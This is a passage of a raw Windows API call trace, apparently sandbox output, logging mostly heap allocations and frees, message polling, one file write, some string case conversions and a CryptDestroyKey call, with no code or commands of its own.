lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.200] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.200] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0087.201] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0087.201] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a970b8 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2acb800 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a970b8 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a30 | out: hHeap=0x2af0000) returned 1 [0087.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.205] WriteFile (in: hFile=0x2c4, lpBuffer=0x2ac5040*, nNumberOfBytesToWrite=0x67b8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac5040*, lpNumberOfBytesWritten=0x8cf5e4*=0x67b8, lpOverlapped=0x0) returned 1 [0087.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.207] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0087.207] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.207] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0087.207] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.207] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.207] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.207] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.207] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.207] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.207] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9c28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.208] CryptDestroyKey (hKey=0x9a3b80) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.209] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.210] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.210] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.210] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0087.210] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.210] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.210] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.211] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0087.211] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.211] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: 